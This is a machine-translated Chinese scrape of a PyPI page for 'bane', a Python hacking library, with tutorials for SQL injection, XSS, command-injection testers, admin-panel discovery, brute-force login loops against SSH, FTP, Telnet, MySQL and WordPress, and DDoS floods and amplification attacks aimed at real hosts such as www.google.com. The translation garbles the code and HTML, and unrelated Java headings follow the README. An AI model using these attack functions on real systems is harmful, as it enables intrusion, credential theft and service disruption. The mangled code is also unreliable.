网络安全库

banelib的Python项目详细描述


"哦,你认为黑暗是你的盟友。但你只是领养了黑暗;我是在黑暗中出生的,被黑暗所塑造。直到我已经是一个男人,我才看到光明,那时对我来说,一切都是盲目的!影子背叛了你,因为它们属于我!"-贝恩(黑暗骑士)

                            .///` `.--::::::---.`` `///.                                    
                            h-.-s+++/--<br>.---/+o++s:.-h                                    
                            ++..-.                `:../s                                    
                         -+ydm-..:                :..-dmho:`                                
                      :odmNNNNs..-.              `:..+MNNNmmy/.                            `
                   .odmNNNNMMMN`..:              -..`mMMMMNNNNmy:                           
                  +mNNNNMMMMMMMo`.:`             :``/MMMMMMMMNNNmy.                         
                .yNNNNMMMMMMMMMd` `-<br>```````..-` `yMMMMMMMMMMNNNd:                        
               -dNNNMMMMMMMMMMMN`  ..-`      `-`-   mMMMMMMMMMMMMNNmo                       
              :mNNNMMMMMMMMMMMMM:   .         `.`  -MMMMMMMMMMMMMMNNNs`                     
             /mNNNMMMMMMMMMMMMMMy   ---      .--   oMMMMMMMMMMMMMMMNNNy`                    
            :mNNNMMMMMMMMMMMMMMMN```:.````````.:```dMMMMMMMMMMMMMMMMNNNy`                   
           -mNNNNMMMMMMMMMMMMMMMMo`.-`        `-.`+MMMMMMMMMMMMMMMMMNNNNo                   
           hNNNNNMMMMMMMMMMMMMMMMm.``-        .``.dMMMMMMMMMMMMMMMMMMNNNm-                  
          -NNNNNMMMMMMMMMMMMMMMMMM-..:        -<br>NMMMMMMMMMMMMMMMMMMNNNNs                  
          oNNNNNMMMMMMMMMMMMMMMMMMo``.`       -` +MMMMMMMMMMMMMMMMMMMNNNNm                  
         :dNNNNNNMMMMMMMMMMMMMMMMMd<br>-``````<br>.hMMMMMMMMMMMMMMMMMMMNNNNNs.                
       .ssmNNNNNNMMMMMMMMMMMMMMMMMM.``/:.  .-/```NMMMMMMMMMMMMMMMMMMNNNNNNyy+`             `
     `oy: mNNNNNNMMMMMMMMMMMMMMMMMM/``-`    `-``:MMMMMMMMMMMMMMMMMMMNNNNNN/`+y:            `
     +y`  dNNNNNNMMMMMMMMMMMMMMMMMMy..-:-  --:..oMMMMMMMMMMMMMMMMMMMNNNNNN:  -N`            
     m-   hNNNNNNMMMNdhhyyhddmMMMMMd```:.``.:```hMMMMNdhso++++shmNMMMNNNNN:   yo           `
    /d    yNNNNNMMh/-````````.-/ydNM.``-    -```NNds:.`..-----..-sNMMNNNNN-   -m`           
    h+    sNNNNNMMmsyhddmmmdhs:` `-o/../`  `/-.:+-` `:yhddmNNNNmmNMMMNNNNN.    d/           
    m/    oNNNNNMMMMMMMNdyssoooo:` `:..``.+```.-.  :o++//+yydMMMMMMMMNNNNN`   .so           
    d--   /NNNNNNMMMMMmyhm//   ymy.`-     o    `- odm:-  .ddssNMMMMMNNNNNm    /:s           
   .h /   :NNNNNNNMMMmhshhy+++ohy/. .:   `o`  `/``-shysssyddddNMMMMNNNNNNd   --.h 
   -y `:  .NNNNNNNMMMMMMMMNNmmmhys/:.`..``.``..`-:syhhdmNNMMMMMMMMMMNNNNNy   / `d 
   :s  :`  dNNNNNMMMMMMMMMNNNmmNNh-    `.`  `.`  `+mMNNNNNMMMMMMMMMMNNNNN+  :`  m          `
   /o   /` oNNNNMMMMMMMMMMMMMMmd+.. `.:- -` - -:.. -sddmNMMMMMMMMMMMMNNNm. .:   m          `
   ++   `:``dNNNMMMMMMMMMMMNo+/.`./-. o`  --`  o `-/.``/+omMMMMMMMMMMNNNo .:    d`         `
   -h    `:`:mNNMMMMMMMMMMd-.+.+--:.`.+.-.::.-./-`.:--/:+..hMMMMMMMMMNNh`.:    -h          `
    s:    `:`+mNMMMMMMMMMm- `/:` o/://++:++++:+/+/:/o``:+` .mMMMMMMMMNd..:     y-           
    .h     `:`/hNMMMMMMd+: -::<br>s-:+`.+:+-.+:+:`/:-+:-.-:- :NMMMMMMNy.--    :y            
     o/   ` `:``:ymMNh:`-  /:-+`o::/`  +:/. +:+`  /::o./--+  /omMNdo- --  `   h.            
     `d` `+.` :.` -s:  -` ./:::`/::/   +-/. +-+`  :::/`-:::- `-`++.``-. `-+  :s             
      o+  /`-:``.-.   `-  /--/  /:-:   +-/. +-+   :-:+  /--/  .. `--. .:..:  h.             
      `d` :` +h+.     -  `+-:: .+-:+..-+://-+:+-../:-+-`-:-/.  -`   -yd. /  /s              
       o+ `:. -ydo.  -`  //::..o/-:o:.//:/++/:/+.:+/-/+: /::o   : :yd+``--  d.              
       `d   .:. -sy ..  .o--+ -.+-.`.-/<br>:/<br>/--`.-+.: +--o-  `/d+``--`:s               
        s/    .:` :.:```-o--o.-.:-` `:/   .:   /:` `-/ / s:-o-```+``.-`    h.               
        .h      -:`/.///`/..`:-.:`<br> <br><br><br>. <br>`: /--../ //:o.:.-y                
         s:       -o/::/:--.-.-.:                    : /`:.---/::+.       y-                
         `h.       ``/. `/ `  -.:```   <br><br>..`  ```: /  ` :` ./.     +o                 
          .y.         -.--    -.:.``- -```::```: ..`./ :    .-.-`       /s                  
           .y-                -.:```: :/::o+/::/ : ``: :              `+o                   
            `s+`     -..-     -.o/:/: `+::+//:+. -/::o`:     ..`-`   .s/                    
              :s-  ./-  `-    -.o//o.  /:::-::+  `o//o :    -`  ./.`+o.                     
               `/o:+..+`.`    -.://+<br>+--//:-+<br>////`:    `../-.ss-                       
                  /h  /` ..-`  .-o/+:..+--//:-+..-o/+:.` `-.- `+  y-                        
                   o+``.-+-.::<br>o//o- /--::--+ .o//s<br>:/.-//:``:s                         
                    -o:```.//:   :+::+.o--oo:-o.+::+/   :/o.```:o:                          
                      -o++oy.:    .- /`o::oo:-+-/ --    /o++++o:                            
                           `os      .. /..//../ ..`    `s:                                  
                            `o+.       `:`:-.-.     `.++-                                   
                              `/+/.`    `.  .`   `-++:`                                     
                                 `:+++/:-<br>-:+++/-                                         
                                      `.-::--`                                              
                                                                                           `

                                                  INTRODUCTION:

此python库仅用于教育目的。作为创建者和开发人员,我不对在任何恶意活动中对该模块的任何误用负责。它是用来理解黑客如何创建他们的工具并执行他们的攻击的工具。它包含了大多数已知的攻击和攻击。它可用于执行:DoS和DDoS攻击(包括所有已知的工具)、信息收集、取消代理、爬网、Google Dorking、检查漏洞(SQL注入(所有类型)、XSS、命令执行、PHP代码注入、FI、强制浏览等)


                                                  SPECIAL SPEECH:

这是献给我的导师:Zachary Barker(https://www.facebook.com/zachary.barker.5439),他是我在黑客世界和黑客团体的旅程中的领导者和老师,我们一起经历了很多,当我还是一名活跃的成员时,我们在很多行动中都在场。在黑帽子社区,但现在他死在一个肇事逃逸:(。他是我真正的网络兄弟之一:

-s0u1(https://www.facebook.com/s0u1.hlotw" rel="nofollow">https://www.facebook.com/s0u1.hlotw):程序员和黑帽子。
-文斯(https://www.facebook.com/vince linux" rel="nofollow">https://www.facebook.com/vincelinux):Linux和硬件专家、社会工程师和程序员。
-zachary barker(lulz zombie):团队领导、Anarkist、Ops Organizer、Progammer、网络安全专家和Blackhat。
-lulztigre(https://www.twitter.com/lulztigre" rel="nofollow">https://www.twitter.com/lulztigre):缺陷赏金猎人、渗透测试人员和python程序员。
-詹希尔。
为了纪念我所有的兄弟和我的兄弟扎克,我第一次与公众分享了我所有的个人黑客工具。请明智地使用它:)

现在让我们开始一些教程,好吗?


                                                  TUTORIALS:

i-安装库并导入:

您可以使用pip来执行此操作:

pip安装bane


或者您可以克隆项目的链接,然后运行setup.py


Git克隆https://github.com/alabouali/bane 溴化镉
python setup.py安装


要导入,只需执行以下操作:

导入危害


注意:

-对于Windows用户,您不能使用:bane.ssh1()和bane.telnet1(),因为它们依赖于pexpect,需要expect包才能工作,而expect包不能安装在Windows上

-termux的用户不能使用这个库,因为有些模块不能安装,所以它没有意义:(


ii-用法:

这个模块有许多令人难以置信的、有用的和易于使用的功能,可以在任何与web应用程序的安全性相关的项目中实现。


漏洞:

默认参数:
logs=true(在屏幕上打印测试结果,设置为false不显示)。
返回=false(返回一个值,指示测试的成功(1/true)或失败(0/false)。
超时:超时值。
代理:与在请求中使用"代理"参数的方式相同。

1-sql-injection:

(有用链接:https://www.acuteix.com/websitesecury/sql-injection2/)


让我们从一个简单的sql注入测试开始。有一些技术可以告诉我们Web应用程序是否易受SQL注入攻击,有:


-基于错误。
-基于布尔值。
-基于时间。


在这里,我们有一些函数可以使用上述技术确定web应用程序是否容易受到sql注入的攻击S.P/P>

bane.sqlieb('http://example.com/index.php?id=5')测试基于错误的sqli

bane.sqlitb('http://example.com/index.php?id=5')测试基于时间的sqli

bane.sqlibb('http://example.com/index.php?id=5')测试基于布尔值的sqli

t 嘿,只返回2个可能的结果:


false:目标不易受攻击。
正确:目标易受攻击。

2-xss:

(有用链接:https://www.acuteix.com/vulnerabilities/web/cross-site-scripting/)


跨站点脚本(xss)是指客户端代码注入攻击,攻击者可以在合法网站或web应用程序中执行恶意脚本。当Web应用程序在其生成的输出中使用未验证或未编码的用户输入时,就会发生XSS。


这里我们有一个函数来获取任何网页中的所有html输入,并使用get和post两种方法逐一测试每个输入以抵御此攻击。

bane.xss('https://xss game.appspot.com/level1/frame')


输出:

获取参数
测试已开始
有效载荷:

<;script>;alert("易受攻击!!!!;<;/脚本>;


参数:查询方法:get=>;[+]找到有效负载
参数:查询方法:post=>;[-]未找到有效负载

如果您没有将"payload"参数(默认设置为:none)修改为任何xss payload,则会使用默认的payload。您可以设置differnet xss payload,以便每次都可以使用代理进行测试。

< BR> 还有另一个函数要测试:


bane.xssget('http://example.com/index.php',{parameter:xss payload here})


bane.xsspost(http://example.com/index.php,%7bparameter" rel="nofollow">http://example.com/index.php,{parameter:xss payload here})



3-fi:

(文件包含):(有用链接:https://www.acuteix.com/vulnerabilities/web/file inclusion/



如果Web应用程序易受FI攻击,则可以使用此功能对其进行测试:


bane.fi('http://example.com/index.php?file=page1.php')


它返回(如果参数"returning"设置为:true)包含
{"status":如果成功或失败,则status=>;true ,
"nullbyte":如果"nullbyte"参数设置为true,则为nullbyte
,"link":r.url==>;结果url}


4-php代码注入:

(有用链接:https://www.acuteix.com/vulnerabilities/web/php-code-injection/


要针对php代码注入测试web应用程序,我们可以使用以下函数:


bane.injectLink('http://example.com/index.php?id=2')


如果返回:


错误:不易受攻击
正确:易受攻击


您也可以使用其他函数来执行此操作:


bane.getinject('http://example.com/index.php",param=parameter here


bane.postinject('http://example.com/index.php',param=parameter here


5命令注入:

(有用链接:https://www.owasp.org/index.php/testing_for_command_injection(otg-inpval-013)


os命令注入是一种通过web界面在web服务器上执行os命令的技术。用户通过web界面提供操作系统命令以执行os命令。任何未正确清理的Web界面都会受到此攻击。通过执行操作系统命令,用户可以上传恶意程序,甚至获取密码。当在应用程序的设计和开发过程中强调安全性时,可以防止操作系统命令注入。


在这里,我们可以使用这些函数来测试web应用程序是否存在此类漏洞:


bane.execlink('http://example.com/index.php?doc=1')


bane.getexec('http://example.com/index.php',param=your_parameter_here


bane.postexec('http://example.com/index.php',param=your_parameter_here


5-强制浏览:

(有用链接:https://www.owasp.org/index.php/forced\u browsing


强制浏览是一种攻击,其目的是枚举和访问应用程序未引用但仍可访问的资源。

攻击者可以使用暴力技术在域目录中搜索未链接的内容,例如临时目录和文件,以及旧的备份和配置文件。这些资源可能存储有关Web应用程序和操作系统的敏感信息,如源代码、凭据、内部网络寻址等,因此被认为是入侵者的宝贵资源。

当应用程序索引目录和页基于数字生成或可预测的值时,或使用自动工具处理常用文件和目录名时,会手动执行此攻击。

此攻击也称为可预测的资源位置、文件枚举、目录枚举和资源枚举。


管理面板:

我们可以使用此方法访问和枚举一些或所有内部管理面板页面,并接管面板!!!!< < > >


强制浏览(http://example.com/admin/" rel="nofollow">http://example.com/admin/",ext="php",timeout=10)


bane.forcebrowsing('http://example.com/admin/',ext="asp")


您还可以使用此处的功能查找站点的管理登录面板:


bane.adminpanel('http://example.com/admin/',ext="php",timeout=7)


默认扩展名是"php",您可以随意更改它:as p,aspx
使用参数"ext"。


文件管理器:


我们可以使用以下技术强制找到可能的文件管理器的路径并接管它:


bane.filemanager('http://example.com')


6-慢速拒绝服务漏洞:

(有用链接:https://www.cloudflare.com/learning/ddos/ddos-low-and-slow-attack/


高超时值:


bane.timeouttest('www.google.com',port=443)


慢速获取攻击测试:


bane.slowgetest('www.google.com',port=80)


慢速攻击后测试:


bane.slowposttest('www.google.com',port=80)


慢读攻击测试:


bane.slowredtest('www.google.com',port=80)


每个IP测试的连接数:


bane.connectionslimit('www.google.com',端口=80)


7-bruteforce攻击:

(有用链接:https://www.acuteix.com/vulnerabilities/web/login-page-password-guessing-attack/" rel="nofollow">https://www.acuteix.com/vulnerabilities/web/login-page-password-guessing-attack/)


在这里,我们使用用户名和密码列表对目标执行bruteforce附加,如果loin函数返回true,则登录失败。


资金转移定价:


单词列表=["admin:admin","admin:12345","root:root"]
对于单词列表中的x:
用户=x.split(":")[0]
pwd=x.split(":")[1]
打印"[*]正在尝试:",用户,pwd
如果bane.ftp("example.com",username=user,password=pwd)==true:
打印"[+]找到"
中断 < BR>
打印"[-]失败"


ssh:


这里有两种登录ssh服务器的方法:


ssh1:

(使用带有"spawn"的pexpect模块,而不是更具解理性的"pexsh")


单词列表=["admin:admin","admin:12345","root:root"]
对于单词列表中的x:
用户=x.split(":")[0]
pwd=x.split(":")[1]
打印"[*]正在尝试:",用户,pwd
如果bane.ssh1("example.com",username=user,password=pwd)==true:
打印"[+]找到"
中断 < BR>
打印"[-]失败"


ssh2:

(使用paramiko模块)


单词列表=["admin:admin","admin:12345","root:root"]
对于单词列表中的x:
用户=x.split(":")[0]
pwd=x.split(":")[1]
打印"[*]正在尝试:",用户,pwd
如果bane.ssh2("example.com",username=user,password=pwd)==true:
打印"[+]找到"
中断 < BR>
打印"[-]失败"


电话网:


这里有两种登录telnet服务器的方法:


telnet1:

(使用带有"spawn"的pexpect模块,而不是使用更为劈开的"pexsh")


单词列表=["admin:admin","admin:12345","root:root"]
对于单词列表中的x:
用户=x.split(":")[0]
pwd=x.split(":")[1]
打印"[*]正在尝试:",用户,pwd
如果bane.telnet1("example.com",username=user,password=pwd)==true:
打印"[+]找到"
中断 < BR>
打印"[-]失败"


telnet2:

(使用telnetlib模块)


单词列表=["admin:admin","admin:12345","root:root"]
对于单词列表中的x:
用户=x.split(":")[0]
pwd=x.split(":")[1]
打印"[*]正在尝试:",用户,pwd
如果bane.telnet2("example.com",username=user,password=pwd)==true:
打印"[+]找到"
中断 < BR>
打印"[-]失败"


smtp:


单词列表=["admin:admin","admin:12345","root:root"]
对于单词列表中的x:
用户=x.split(":")[0]
pwd=x.split(":")[1]
打印"[*]正在尝试:",用户,pwd
如果bane.smtp("example.com",username=user,password=pwd)==true:
打印"[+]找到"
中断 < BR>
打印"[-]失败"


MySQL:


单词列表=["admin:admin","admin:12345","root:root"]
对于单词列表中的x:
用户=x.split(":")[0]
pwd=x.split(":")[1]
打印"[*]正在尝试:",用户,pwd
如果bane.mysql("example.com",username=user,password=pwd)==true:
打印"[+]找到"
中断 < BR>
打印"[-]失败"


管理员登录:


单词列表=["admin:admin","admin:12345","root:root"]
对于单词列表中的x:
用户=x.split(":")[0]
pwd=x.split(":")[1]
打印"[*]正在尝试:",用户,pwd
如果bane.admin login(http://example.com/admin/login.php,{'username':用户,'password':pwd)==true
打印"[+]找到"
中断 < BR>
打印"[-]失败"


wordpress管理员登录:


单词列表=["admin:admin","admin:12345","root:root"]
对于单词列表中的x:
用户=x.split(":")[0]
pwd=x.split(":")[1]
打印"[*]正在尝试:",用户随钻测井
如果bane.wpadmin(http://example.com/",username=user,password=pwd)==true
打印"[+]找到"
中断 < BR>
打印"[-]失败"


液压工具:


hydra是一种著名的工具,广泛用于暴力攻击。以下是基于上述函数的python版本。
需要以下参数:


proto:默认设置为"ssh",可以设置为:"ftp"、"ssh"、"telnet"、"smtp"、"mysql"、"wp"(在http协议上强制wp站点)
p:目标端口,默认设置为:22
wl:列表包含用户名和密码,用":"分隔,例如:["admin:admin"、"admin:12345"、"root:root"]


单词列表=["admin:admin","admin:12345","root:root"]
bane.hydra("127.0.0.1",proto="telnet",p=23,wl=wordlist)


拒绝服务/拒绝服务:

(有用链接:https://en.wikipedia.org/wiki/denial-of-service_attack


bane.hulk('www.google.com',threads=1000)hulk攻击


bane.proxhulk('www.google.com',threads=1000)使用http代理的hulk攻击


bane.slowloris('www.google.com',p=80,threads=50)slowloris攻击


bane.xerxes('www.google.com',p=443,threads=500)xerxes攻击


bane.http flood('www.google.com',p=80,threads=1000)http洪水


bane.lulzer('www.google.com',p=80,threads=1000)http代理泛滥


bane.tcp flood('www.google.com',threads=1000)TCP洪水


bane.udp('50.63.33.34',p=80)udp洪水


bane.doser(https://www.google.com,threads=500" rel="nofollow">https://www.google.com,threads=500)


bane.proxdoser(https://www.google.com,threads=500" rel="nofollow">https://www.google.com,threads=500)


bane.torshammer('www.google.com',p=80,threads=1000)


bane.sloread('www.google.com',p=80,threads=1000)


bane.apachekiller('www.google.com',p=80,threads=500)


bane.goldeneye('www.google.com',p=80,threads=1000)


bane.medusa('www.google.com',p=80,threads=1000)


bane.icmp('50.63.33.34',p=80,线程=100)


bane.synflood('50.63.33.34',p=80,线程=100)


bane.icmpstorm('50.63.33.34',p=80,线程=100)


贝恩兰德('50.63.33.34',p=80,线程=100)


bane.udpstorm('50.63.33.34',p=80,线程=100)


bane.blacknurse('50.63.33.34',p=80,线程=100)


bane.dnsamplif('50.63.33.34',p=80,dns list=[此处列出您的dns服务器],线程=100)


bane.ntpamplif('50.63.33.34',p=80,dnslist=[此处列出您的NTP服务器],线程=100)


bane.snmpamplif('50.63.33.34',p=80,dnslist=[此处列出您的SNMP服务器],线程=100)

欢迎加入QQ群-->: 979659372 Python中文网_新手群

推荐PyPI第三方库


热门话题
java如何将字符串转换为自定义对象   java如何从socket方法获取数据?   Java中的soap读取回车和新行   java在单击时替换图像   java推荐的使用RXJava执行异步任务的方法   java MySql连接器JDBC驱动程序不支持连接池吗?   java将活动堆栈清理到顶部   java计数用户输入的数量   java从webservice下载大文件导致应用程序性能问题   JavaLocalDate。EPOCH不可用   java如何在使用Selenium等待一定时间后,在页面无法加载(get(url))时自动刷新页面   java Calendar setLenient方法不允许检查年份字段的健全性   java Eclipse和intelliJ 安卓 SDK问题   java为什么我可以在没有super关键字的情况下调用父方法?   java iText的PDF格式不好